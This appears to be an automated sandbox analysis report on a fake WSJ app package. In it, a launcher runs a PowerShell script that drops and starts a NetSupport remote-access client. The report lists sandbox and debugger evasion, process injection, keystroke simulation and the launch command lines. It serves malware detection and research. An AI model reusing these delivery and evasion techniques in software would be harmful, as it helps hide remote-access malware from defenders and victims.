Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEB91F0		32_2_6BEB91F0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BEC4F30		32_2_6BEC4F30

Delayed program exit found

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110B7290 Sleep,ExitProcess,

32_2_110B7290

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899888	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899776	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899664	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899552	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899440	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899312	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899200	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7678	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2187	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1859	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7949	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1654	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8173	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1945
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2502
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 882
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 480

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\ProgramData\netsupport\client\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\ProgramData\netsupport\client\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\ProgramData\netsupport\client\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\ProgramData\netsupport\client\HTCTL32.DLL	Jump to dropped file

Found evaded block containing many API calls

Source: C:\ProgramData\netsupport\client\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\netsupport\client\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\netsupport\client\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\netsupport\client\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\netsupport\client\client32.exe	Evaded block: after key decision

Found evasive API chain (date check)

Source: C:\ProgramData\netsupport\client\client32.exe

Evasive API call chain: GetLocalTime,DecisionNodes

Found evasive API chain checking for process token information

Source: C:\ProgramData\netsupport\client\client32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\ProgramData\netsupport\client\client32.exe

API coverage: 6.3 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_6BEC4F30

32_2_6BEC4F30

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576	Thread sleep count: 1859 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576	Thread sleep count: 7949 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7744	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3484	Thread sleep count: 1654 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2276	Thread sleep count: 8173 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899888s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899776s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899664s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899552s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899440s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899312s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1044	Thread sleep time: -899200s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5132	Thread sleep count: 1945 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3744	Thread sleep count: 2502 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176	Thread sleep count: 882 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176	Thread sleep count: 480 > 30

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\ProgramData\netsupport\client\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\netsupport\client\client32.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Uses the system / local time for branch decision (may execute only at specific dates)

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_6BEC3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6BEC3226h

32_2_6BEC3130

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	32_2_1102D1B3
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	32_2_11069760
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	32_2_11123690
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11108090 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	32_2_11108090
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	32_2_110BC0E0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	32_2_1102CE84
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	32_2_11064EF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 25_2_00007FF9BAF53778 GetSystemInfo,

25_2_00007FF9BAF53778

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899888	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899776	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899664	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899552	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899440	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899312	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899200	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: HTCTL32.DLL.26.dr	Binary or memory string: VMware
Source: powershell.exe, 00000029.00000002.2535977313.000002678CAF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: # BKiMitLJGDL9NaX+nk4vmCIjaQQ2tULiu82AWhbXS7NsVRmPmCQW0LucN/Z0BUZX
Source: powershell.exe, 00000029.00000002.2535977313.000002678CAF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmCIjaQQ
Source: client32.exe, 00000020.00000002.2520445291.00000000008E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AF_UNIXhreadWndClassHyper-V RAWL
Source: HTCTL32.DLL.26.dr	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.26.dr	Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: powershell.exe, 0000001A.00000002.2193452131.0000023179868000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1941852161.0000000005A08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: HTCTL32.DLL.26.dr	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: TCCTL32.DLL.26.dr	Binary or memory string: VMWare
Source: client32.exe, 00000020.00000002.2492715812.0000000000812000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(Z

Source: C:\ProgramData\netsupport\client\client32.exe	API call chain: ExitProcess graph end node
Source: C:\ProgramData\netsupport\client\client32.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1115E3E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

32_2_1115E3E1

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110CF9F0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,

32_2_110CF9F0

Contains functionality to dynamically determine API calls

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_11029200

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_11178924

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11030A50 _NSMClient32@8,SetUnhandledExceptionFilter,	32_2_11030A50
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11092090 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	32_2_11092090
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1115E3E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_1115E3E1
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1116A469 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_1116A469
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BED28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	32_2_6BED28E1
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_6BED87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	32_2_6BED87F5

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match	File source: amsi64_2564.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_7788.amsi.csv, type: OTHER

Maps a DLL or memory area into another process

Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: NULL target: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe protection: readonly	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: readonly	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\ProgramData\netsupport\client\client32.exe protection: readonly	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: NULL target: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe protection: readonly
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: readonly

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: GetWindowRect,GetWindowLongA,GetClassNameA,GetWindowThreadProcessId,OpenProcess,CloseHandle,FreeLibrary, \Explorer.exe

32_2_1102FB50

Contains functionality to execute programs as a different user

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110F21E0 GetTickCount,LogonUserA,GetTickCount,GetLastError,

32_2_110F21E0

Contains functionality to simulate keystroke presses

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1110F530 GetKeyState,DeviceIoControl,keybd_event,

32_2_1110F530

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\ProgramData\netsupport\client\client32.exe "C:\ProgramData\netsupport\client\client32.exe"	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe "PsfRunDll64.exe"
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_1109D240

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_1109D9C0 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

32_2_1109D9C0

